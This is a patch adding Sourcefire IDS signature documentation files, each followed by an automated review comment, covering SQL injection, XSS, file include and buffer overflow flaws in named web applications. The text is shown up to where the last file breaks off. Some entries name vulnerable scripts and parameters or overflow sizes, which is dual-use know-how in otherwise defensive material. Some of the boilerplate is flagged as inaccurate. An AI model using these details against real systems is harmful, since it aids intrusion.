@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000539
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "thinkWMS" application running on a webserver. Access to 
+the file "printarticle.php" with SQL commands being passed as the "id" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "printarticle.php" script used by 
+the "thinkWMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using thinkWMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
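Review bot: The third paragraph of Detailed Information (from "This event is generated when an attempt is made to gain unauthorized access" to "exploited by the attacker") is generic credential validation boilerplate that does not describe SQL injection through the "id" parameter and duplicates the first paragraph; drop it. "running ona web server" should be "running on a web server", and "attackers choosing" in Impact should be "attacker's choosing". The "--" separators after the Sid value, after Affected Systems and after Contributors lack the blank line the other files use, and there is a stray blank line after the final "--".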
--- /dev/null
+++ b/doc/signatures/2353.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2353
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application IdeaBox.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+IdeaBox contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable ideaDir when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file cord.php.
+
+--
+Affected Systems:
+	PHPOutsourcing IdeaBox 1.0
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the ideaDir variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
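Review bot: "the privileges of the user running the webserver, usually root" in Detailed Information is wrong as a general statement; web servers normally run as an unprivileged account, and code included by PHP runs as that account. Say "the privileges of the user running the webserver" and, if root is meant, qualify it as a misconfiguration. In the same paragraph, "by supplying their code in the file cord.php" is unclear: state whether cord.php is the vulnerable script that includes ideaDir or an attacker-chosen file name. "GET or POST  request  to" has double spaces. Additional References is empty although the vendor and version are named under Affected Systems.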
--- /dev/null
+++ b/doc/signatures/100000528.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000528
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "PHPMyForum" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "highlight" parameter in the "topic.php" script 
+used by the "PHPMyForum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMyForum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
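Review bot: Impact and Detailed Information carry the server compromise boilerplate ("Possible unauthorized administrative access to the server", "execute system binaries or malicious code") used for the SQL injection and file include documents in this patch, but the Summary describes a cross site scripting flaw in the "highlight" parameter, whose payload runs in the victim user's browser, not on the server. Reword Impact to the consequence Attack Scenarios already gives (information stolen from a user who follows a crafted link) and drop "execute system binaries". The "--" after the Sid value, after Affected Systems and after Contributors lack the blank separator line.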
--- /dev/null
+++ b/doc/signatures/2154.txt
@@ -0,0 +1,60 @@
+Rule:
+
+
+--
+Sid:
+2154
+
+--
+Summary:
+This event is generated when a remote user attempts to access autohtml.php on a web server. This may indicate an attempt to exploit a  vulnerability in PHP-Proxima, a web site portal application.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in the autohtml.php script within PHP-Proxima. An attacker can use directory traversal techniques when accessing autohtml.php to view hidden files and directories on the web server with the access privileges of the server. In addition, an attacker can enter an arbitrary file name within the "name" parameter of the autohtml.php call, and if the file exists, the attacker can view it.
+
+--
+Affected Systems:
+Any server running PHP-Proxima.
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques or use a specific filename in the "name" parameter of the URL when executing autohtml.php to view specific directories and files on the web server.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses autohtml.php, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Comment out or remove the "include("autohtml/$name");" line from the autohtml.php script.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7598
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11630
+
+--
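Review bot: The Corrective Action, "Comment out or remove the "include("autohtml/$name");" line from the autohtml.php script", removes the feature rather than fixing the flaw that Detailed Information identifies (an unvalidated "name" parameter). Suggest a vendor upgrade as the first option and, failing that, restricting $name to a fixed list of allowed file names (or rejecting path separators and ".." sequences) before the include. "a  vulnerability" in the Summary has a double space.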
--- /dev/null
+++ b/doc/signatures/689.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
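Review bot: The Sid field is empty (the line after "Sid:" is blank), so the file cannot be matched to the rule it documents; fill in 689. Attack Scenarios ("Simple. These are SQL database commands.") answers the Ease of Attack question and should describe a scenario, such as an external host issuing an administrative command to an exposed database server. The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" refers to telnet and looks pasted from a different signature's document. Affected Systems is missing. In Corrective Action, "Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise" needs a comma or "and" between the clauses and a terminating period.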
--- /dev/null
+++ b/doc/signatures/863.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+863
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
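Review bot: "running ona web server" in Detailed Information should be "running on a web server", and "attackers choosing" (Impact and Detailed Information) should be "attacker's choosing". As with 1161.txt earlier in this patch, the text is generic and never names the CGI script or vulnerability that SID 863 matches; add the script name to Summary and Detailed Information and a reference under Additional References, otherwise the "None known" False Positives claim cannot be evaluated.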
--- /dev/null
+++ b/doc/signatures/2168.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2168
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
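Review bot: The body of this file is identical to 2170.txt earlier in this patch except for the SID, so neither document tells the reader which filename extension its rule matches; state the extension here so the two can be told apart. Same fixes as there: "An virus" to "A virus" and "propogate" to "propagate" in Impact, and the extra blank line after the Sid value.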
--- /dev/null
+++ b/doc/signatures/1015.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1015
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
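Review bot: Impact, "Information gathering possible administrator access.", is missing punctuation between the two consequences; suggest "Information gathering. Possible administrator access." Detailed Information, Attack Scenarios and Corrective Action are shared word for word with the IIS document at the top of this patch, and neither names the IIS file the rule detects; add the file name to the Summary and a reference under Additional References, which is empty. "Sid: 1015" puts the number on the heading line and is followed by two blank lines, unlike the other files.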
--- /dev/null
+++ b/doc/signatures/100000360.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000360
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "drucken2.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "drucken2.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
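Review bot: redundant and misspelled wording in 100000360.txt: "an exploitation attempt has been attempted" in the Summary should read "an exploitation attempt has been made", "running ona web server" in Detailed Information is missing a space, and "attackers choosing" in the Impact needs an apostrophe ("attacker's choosing"). Additional References is empty although the rule names a specific script ("drucken2.php") and parameter ("config[fsBase]"); a link to the vulnerability advisory would let operators confirm which versions are affected.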
--- /dev/null
+++ b/doc/signatures/911.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+911
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
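Review bot: the product name is spelled two ways in 911.txt ("ColdFusion" in the Summary, "Coldfusion" in Detailed Information); use "ColdFusion" throughout. "attackers choosing" in the Impact needs an apostrophe, and Additional References is empty even though the Summary refers to a known vulnerability.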
--- /dev/null
+++ b/doc/signatures/100000542.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000542
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Dating Agent" application running on a webserver. Access 
+to the file "mem.php" with SQL commands being passed as the "mid" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "mid" parameter in the "mem.php" script used by the 
+"Dating Agent" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Dating Agent
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
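Review bot: section separators are inconsistent in 100000542.txt: the "--" after the Sid, after Affected Systems and after Contributors lack the preceding blank line every other section has. Wording: "running ona web server" is missing a space, "an exploitation attempt has been attempted" is redundant, and "it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries" is a comma splice that should be split into two sentences.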
--- /dev/null
+++ b/doc/signatures/1118.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1118
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
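Review bot: "attackers choosing" in the Impact of 1118.txt needs an apostrophe ("attacker's choosing"). The text is generic boilerplate with an empty Additional References section; one sentence on what request pattern the rule matches would make the "None known" False Positives claim assessable.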
--- /dev/null
+++ b/doc/signatures/3059.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3059
+
+--
+Summary:
+This event is generated when an attempt is made to initiate a TLS
+connection via SSL version 2.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule indicates that an attempt has been made to initiate a TLS
+connection via SSL v2. This rule should not generate an event.
+
+--
+Affected Systems:
+	All implementations using SSL.
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
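Review bot: Detailed Information in 3059.txt says "This rule should not generate an event", which contradicts the Summary stating that an event is generated when a TLS connection is initiated via SSL version 2. State the intended behaviour in one place (is the rule informational or an alert?), and fill in "Impact: Unknown" and "Corrective Action: NA" consistently with that answer.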
--- /dev/null
+++ b/doc/signatures/2598.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2598
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in the Samba Web Administration Tool (SWAT).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in SWAT that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an the functions that handle base64 decoding
+during HTTP basic authentication. Exploitation of this vulnerability
+may present the attacker with the opportunity to gain control of the
+affected system.
+
+--
+Affected Systems:
+	 Versions of Samba greater than or equal to 3.0.2 and
+     less than 3.0.5
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the SWAT
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600
+
+Bugtraq:
+http://www.securityfocus.com/bid/10780
+
+--
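Review bot: typos in 2598.txt: "in an the functions" (drop "an") in Detailed Information and "attcker" in Attack Scenarios. The two Affected Systems lines are indented with a tab and with spaces respectively; use one style. The CVE link uses the legacy candidate name "CAN-2004-0600"; the same identifier is now published as CVE-2004-0600, so label it that way.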
--- /dev/null
+++ b/doc/signatures/2556.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2556
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
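Review bot: version strings in the Affected Systems list of 2556.txt contain stray spaces ("10g 9.0.4 .0", "2.0 .0.4", "9.0.2 .3", "9.0.2 .2", "9.0.3 .1"); write them as "9.0.4.0", "2.0.0.4", "9.0.2.3" and so on. Several "-- " separators carry trailing whitespace and some are followed by an extra blank line before the next heading, unlike the rest of the patch. Additional References is empty although the 432-byte threshold in Attack Scenarios points to a specific published advisory.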
--- /dev/null
+++ b/doc/signatures/1259.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1259
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
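Review bot: 1259.txt is word-for-word the same text as 1118.txt earlier in this patch, including the "attackers choosing" apostrophe error in the Impact. Sid-specific documentation should say what distinguishes this rule; at least the Summary and Detailed Information should name the request pattern it matches.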
--- /dev/null
+++ b/doc/signatures/1039.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+1039
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+This event is generated when an attempt is made to access a sample 
+application on a Microsoft IIS server. In this case the sample search 
+functionality. This application may present an attacker with the 
+opportunity to gain valuable information regarding the implemenation of 
+IIS on the affected host.
+
+--
+Affected Systems:
+	Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+Delete or disable access to any sample applications on the host.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/support/kb/articles/Q188/2/57.ASP&NoWebContent=1
+
+--
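Review bot: "implemenation" in Detailed Information of 1039.txt is a typo, and "Information gathering possible administrator access." in the Impact lacks punctuation between the two items ("Information gathering; possible administrator access."). The Microsoft URL ends in "&NoWebContent=1", which looks like a copied query-string fragment; check that the link resolves as written.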
--- /dev/null
+++ b/doc/signatures/3314.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3314
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
